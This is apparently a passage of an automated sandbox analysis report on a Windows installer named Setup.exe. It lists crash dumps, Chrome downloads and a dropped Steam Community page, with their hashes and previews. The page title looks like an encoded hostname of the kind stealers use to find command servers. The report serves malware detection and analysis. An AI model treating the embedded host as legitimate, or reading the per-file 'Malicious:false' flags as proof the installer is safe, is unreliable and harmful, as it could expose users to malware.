                                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                                    Entropy (8bit):1.1718394771223088
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:TrBWw1hX0NXU6j3RV6+2zuiFPZ24IO8z:T9WYhkNXU6jp2zuiFPY4IO8z
                                                                                                                                                                                                                                                    MD5:DA7B66E9EBB14F207EC1D382F21BC90D
                                                                                                                                                                                                                                                    SHA1:E4B08855F20A564448F2F43F1D5CF7119455B89D
                                                                                                                                                                                                                                                    SHA-256:98D5E6CD17B402BAEE0136DB2CE81B96DE58BDE38085F14A1B89BCD94B68B8BF
                                                                                                                                                                                                                                                    SHA-512:BA889607C726C9AF97FB583636194554D32440AA740C782E2FFBF7609680811FC2A2E6A9A6EF4B73498216075A59AA7B9123976BB70E7A9D03FE6205ADE49AD9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                                                    Entropy (8bit):1.169740552928061
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:avj+Ww1ven0mCichbrj3RV6+2zuiF0Z24IO8z:xWYve0mAbrjp2zuiF0Y4IO8z
                                                                                                                                                                                                                                                    MD5:036561391465350DF48E5F19200F3EEE
                                                                                                                                                                                                                                                    SHA1:A45BE442E31B15F615DEBF0D2AA44CF361812ADA
                                                                                                                                                                                                                                                    SHA-256:E014477BED606C98B73529E2A4142206C292A00F20FCF08060898D90D72F7B56
                                                                                                                                                                                                                                                    SHA-512:B79CFA0E42ABD804F56D6B041B8C17C3109ABA52E4AD43E19D73A8AC3B067F20749FCB4D30BC77B102D0D0B215BA5AFF84F2F4F0AEB93D47FD5D0D15E8689AE7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Fri Dec 27 20:28:37 2024, 0x1205a4 type
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):124054
                                                                                                                                                                                                                                                    Entropy (8bit):2.1029328078437644
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:k0nQeH89XxbjInyzopc5/uihty8eWr/bS7+lWqC:kgQEQd0nyUky8FLeKs
                                                                                                                                                                                                                                                    MD5:CF57899FE490499422C0109900D767A7
                                                                                                                                                                                                                                                    SHA1:A8E208FECCAC02EA82C83A9C9AA93DCF3A2A7EAD
                                                                                                                                                                                                                                                    SHA-256:E77BE5EF4E735EE4CCF54506204C657979C475C76BB07D70F69D9FB97C175614
                                                                                                                                                                                                                                                    SHA-512:F926BD9FD3053A2CECDD89A348EC82141A7B44B1829605E45C29A47F6C9E75929E6C0B072B4487A777A79F574F842256FFAD05CF12541C5A3C501EE20601550B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8350
                                                                                                                                                                                                                                                    Entropy (8bit):3.702458423142935
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJeq6KE56Y9eSU9eB0gmf4443icXpDa89bEVsf8Mm:R6lXJL6n6Y0SU9Dgmf4449Eufu
                                                                                                                                                                                                                                                    MD5:BC1D081030EA1899D7D1E58F2B34477B
                                                                                                                                                                                                                                                    SHA1:640446FB341BFA1566D915A52FB5727736850615
                                                                                                                                                                                                                                                    SHA-256:D4051D4FDDD87BA0E2F889D019620A1D556E475EF7ABF8CA570F1B731E25DD02
                                                                                                                                                                                                                                                    SHA-512:3F18E74C0131D5C3C9FAB20418A9F45742F1979DD52F6805DF9DF662E2BF9D61C916200DB522EE65D06E7DACF91239D52272EA4B1FCC09A3E1C16225F1718E14
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                     Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6592</Pi
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4722
                                                                                                                                                                                                                                                    Entropy (8bit):4.457510207417577
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsEJg77aI9i1WpW8VYWYm8M4JeXK/FJ+q8IXrL7tQ1Ud:uIjfCI7cE7ViJeXgvXP+1Ud
                                                                                                                                                                                                                                                    MD5:C6D473971A5AD473A3BDEF1A5D1EB0F6
                                                                                                                                                                                                                                                    SHA1:E43154EE55F3303CCD9B1A72470926D6D9E41840
                                                                                                                                                                                                                                                    SHA-256:2752BD3E5134B4B60BD320D890D35B7B700E9511E917BDF7A28D372498C3DA33
                                                                                                                                                                                                                                                    SHA-512:51EDF72EA301D3479A1AFBCC2F2AD744D33C1E7C02635DD0AF30BDE99C5636CAA928A2C12DFE871376C399366BF6879E0F01E92E06FF7F6955FDF6B29AFCFDE6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650131" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Fri Dec 27 20:27:45 2024, 0x1205a4 type
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):127782
                                                                                                                                                                                                                                                    Entropy (8bit):2.0835171154188172
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:KiKwBWxSQeHtaXaKxbjIAqg8HCdFpP5Z5Yg3hTcCr5mypNCQJjAg7J99RPeA0Ffo:pnQeH8X7xbjIngcc5/YMhTcIpLxwycLa
                                                                                                                                                                                                                                                    MD5:DF9A71C15538B1714DB1270200199D44
                                                                                                                                                                                                                                                    SHA1:90400CDF01DE0B1055F4BF396128F8E73F5096E7
                                                                                                                                                                                                                                                    SHA-256:2F25D40D11F25541FDC83FF74DAA13FDE184A816F2B17AB5283E478D4A84A713
                                                                                                                                                                                                                                                    SHA-512:69A4E0E1CE2FF9B470655A6FE77034A775F22EBA71D0110FD4EA41ED21A1A3F55C6337A002EF77243D77AFE967F98541B86F02ED2AEB97AB1B340D773D4C9112
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8376
                                                                                                                                                                                                                                                    Entropy (8bit):3.7029665753499055
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJeD6KoO66Y94SU99ZStcgmf93prt89bDiVsfrJQm:R6lXJi6x6YiSU9rStcgmf9gDiufFV
                                                                                                                                                                                                                                                    MD5:F9D5D6AB3F8E33815A802508266CD2B2
                                                                                                                                                                                                                                                    SHA1:E3F41D09EF30E5714D9352BE775D8CB229259078
                                                                                                                                                                                                                                                    SHA-256:4E28C7E056E691F99656A33D81ACA30233D653CFA7DA9E59774091AD428782F9
                                                                                                                                                                                                                                                    SHA-512:D07AFC0AF47833D213D1D1DFE2176040686836BF3AFC7018411D4F8577A123720E4C7A16CC3B75B42D857348BBA0C09890FB8112EBDF738AD6447FF86D6D6DE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                     Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>19045</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>....<Revision>2006</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>2057</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6592</Pi
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4746
                                                                                                                                                                                                                                                    Entropy (8bit):4.4695199453614585
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsFNJg77aI9i1WpW8VYoYm8M4JeXKeFL+q8IXKj7tQ1Ud:uIjfFnI7cE7VgJeXjvXw+1Ud
                                                                                                                                                                                                                                                    MD5:53E23A476B1E23D134CB01230C93D325
                                                                                                                                                                                                                                                    SHA1:E76B01DC230637FBB96BA0C8C1E5C6B3DB804596
                                                                                                                                                                                                                                                    SHA-256:63F5348F695E2C874066BC10736800E01C2364D62E140E316419D3FCC1E7CC1E
                                                                                                                                                                                                                                                    SHA-512:A439B3622B93B4C86C38DC10F1507BA80A1E6FB139748F5E95D4C48F913E9C93A9CF8AA8674729598BC9B3B2283B2FFE157C22E81996E5A916CD07423B502768
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="650130" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3188)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):35329
                                                                                                                                                                                                                                                    Entropy (8bit):5.378748057464046
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:ifBpqhYGM4evx83TfwtunNS3FPaXfsW9l+X9hJYFnzOMD5QBdxaXfsW9l+X9hJYY:KB8hYGM4evx83Tfwtun8PaXfsW9l+X9v
                                                                                                                                                                                                                                                    MD5:A490919BCCF25D2BED09C734C53FE02B
                                                                                                                                                                                                                                                    SHA1:D19FA7ADDCFBBEDD0CAE819FECB23F7C0DC79A76
                                                                                                                                                                                                                                                    SHA-256:22567A4A9670C5FADB8286251D16CE88DAF1DA1EE9BD05B1A06F595D7C4201E9
                                                                                                                                                                                                                                                    SHA-512:BA0178BA1674E322E27AFFA77C7DE66E2F587D8C785FEF3DFB103BC2983B73CD55EC03F324439D25607DF3F11ACFB95E6D5BA3722011F65EE11A750EA67387C3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: r5q cmFzMi5zaG9wt6t</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cdn=fastly" re
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (30928), with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):30928
                                                                                                                                                                                                                                                    Entropy (8bit):5.443822786604349
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:yFvPUMUHoRcE6fVSZSu4PbqGXan43ExEqB7L:y9P1RcffVSZpig2uv
                                                                                                                                                                                                                                                    MD5:2928EFC088594ACABC759E97008D95FC
                                                                                                                                                                                                                                                    SHA1:15291388DC125686205796DC544CEFA5703BDB55
                                                                                                                                                                                                                                                    SHA-256:38D6EB08CC649AD11A1A23203B33CC526DA438A57E373673D44F8B5EEAFE64B4
                                                                                                                                                                                                                                                    SHA-512:0290E2FD0567EC82D2EBBB4AC19339940F910545F4E6FD0E9E55FC0FFAFB3817CB3DDC08C9EED4A2E6C1AAABCE21A4B791302262D804F22019AE795196CC70D8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                                                                                                                    Entropy (8bit):4.466317720853292
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:qIXfpi67eLPU9skLmb0b4rWSPKaJG8nAgejZMMhA2gX4WABl0uNHdwBCswSb/:fXD94rWlLZMM6YFH1+/
                                                                                                                                                                                                                                                    MD5:0FCC9CED19F2526709F1AB4FEE7AD166
                                                                                                                                                                                                                                                    SHA1:65A09FB3B4A7CEA3305FEDF7E4E6ABB0AEC8A8A5
                                                                                                                                                                                                                                                    SHA-256:F5F353849023EC3932E14254C7B8776EBE36425A7E418315C43EA6132270906A
                                                                                                                                                                                                                                                    SHA-512:A9185C87AE2D270198C7B1E3DDE247E0AE357C28862C2C8EE242EE1737642E9FDF0A75D1C8F4998F3569C6C1CF3668CC41556AF0E6FC3C1BF4A2C9A0BF93A66D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):166
                                                                                                                                                                                                                                                    Entropy (8bit):4.854864396080962
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Vwp+EHwwBHsLpYJWriFGHTe7vTxZVVdMR7GWjLwWkzXFETH1u4:VwQEH5BHsL2YriFGHTAr8FGAwWeXFELN
                                                                                                                                                                                                                                                    MD5:4DCC0ED0AF2893FCA50E9233DE7DE2B2
                                                                                                                                                                                                                                                    SHA1:9089C63E40808E4544ECAAE24D136A5DFC837BD3
                                                                                                                                                                                                                                                    SHA-256:5B4024E9DAB7EE7ACAB73AF0CDFBC8D81C8406637084F6DFE97C91735E74B3FA
                                                                                                                                                                                                                                                    SHA-512:5267AD3100D920729A450186CC8FB44DD869A88A49667AC62A4DB6C42CF8E0282A5A978EA17D43A3760F203782A9928D73362CCA4B3940415382660BB41A7D41
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                    Preview:)]}'.["",[],[],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:suggesteventid":-2079642914939795008,"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):117446
                                                                                                                                                                                                                                                    Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                                    MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                                    SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                                    SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                                    SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):132767
                                                                                                                                                                                                                                                    Entropy (8bit):5.436989257248335
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:fskJQ7O4N5dTm+syHEt4W3XdQ4Q6AuSr/nUW2i6o:f5Q7HTt/sHdQ4Q6ADfUW8o
                                                                                                                                                                                                                                                    MD5:8B24D6304AE4C2F5478CCD93895CF7E9
                                                                                                                                                                                                                                                    SHA1:3591F73EDC79FA28DA5F7DF4E713A98FAD1F246C
                                                                                                                                                                                                                                                    SHA-256:F17FBDF1532688298AA7BC81A208922484C1DED7400CE79D945B46B9846990E7
                                                                                                                                                                                                                                                    SHA-512:C582B159B71857975785502A4B716DC4F4609ADDA1ABBFBDA7A60D935D7AA3F1F4EF8A0A0E4F2CFC8D82F38DDD67CDDBFE15BF2A29D868F489CA517D8FAD31E3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):175897
                                                                                                                                                                                                                                                    Entropy (8bit):5.549876394125764
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:t0PuJ7UV1+ApsOC3Ocr4ONnv4clQfOQMmzIWrBQoSpFMgDuq1HBGANYmYALJQIfr:t0PuJQ+ApsOOFZNnvFlqOQMmsWrBQoSd
                                                                                                                                                                                                                                                    MD5:2368B9A3E1E7C13C00884BE7FA1F0DFC
                                                                                                                                                                                                                                                    SHA1:8F88AD448B22177E2BDA0484648C23CA1D2AA09E
                                                                                                                                                                                                                                                    SHA-256:577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
                                                                                                                                                                                                                                                    SHA-512:105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTu0yU9RTMfNNC-LVUmaaNKwIO136g"
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):0.8030740299766413
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 98.88%
                                                                                                                                                                                                                                                    • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:Setup.exe
                                                                                                                                                                                                                                                    File size:76'542'479 bytes
                                                                                                                                                                                                                                                    MD5:f18fa7132a5eda29041fdd8ae85363db
                                                                                                                                                                                                                                                    SHA1:4de6de8445b5dc6897461b684da74df7e9673f78
                                                                                                                                                                                                                                                    SHA256:543c81da09d6669ddf5fbb2d6c3889d7dabfd166d3f726349c30a51c542a2f50
                                                                                                                                                                                                                                                    SHA512:a61f193ea0e2bc13127b71756ebf90c98b09d8940105008eddce4f85adbb0c2f3adc526a2eebb6c81e6aca170d74dde974b0bf16df368906754c8177e3634beb
                                                                                                                                                                                                                                                    SSDEEP:49152:Tdx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoCVHNTQTEj3333wIPmXs4rTLa:4HDYsqiPRhINnq95FoCVB3333j+vm
                                                                                                                                                                                                                                                    TLSH:1DF72926E3CC23A9F71716750A33B2D39937AF1023127CD752FD15498E2B4D81A3AA5B
                                                                                                                                                                                                                                                    File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                                                    Icon Hash:0b1916161d151191
                                                                                                                                                                                                                                                    Entrypoint:0x6c5660
                                                                                                                                                                                                                                                    Entrypoint Section:.itext
                                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                    Time Stamp:0x6258476F [Thu Apr 14 16:10:23 2022 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
